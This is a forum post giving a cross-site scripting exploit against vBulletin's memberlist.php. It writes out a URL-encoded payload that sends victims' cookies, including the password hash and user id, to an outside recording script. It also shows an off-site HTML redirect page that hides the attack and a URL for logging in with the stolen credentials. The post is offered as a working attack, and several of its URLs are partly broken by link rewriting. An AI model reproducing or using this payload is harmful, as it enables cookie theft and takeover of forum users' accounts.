Jump to content
xisto Community
Sign in to follow this  
spyshow

Vbulletin1 Gap

Recommended Posts

Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

http://forums.xisto.com/no_longer_exists/
http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%


2Ephp%3Fcook%3D%27%2B
escape%28document%2Ecookie%29%3C%2Fscript%3E
(NOTE: The URL should be on a one line)

You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://forums.xisto.com/no_longer_exists/
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco


rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to http://forums.xisto.com/no_longer_exists/.

With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.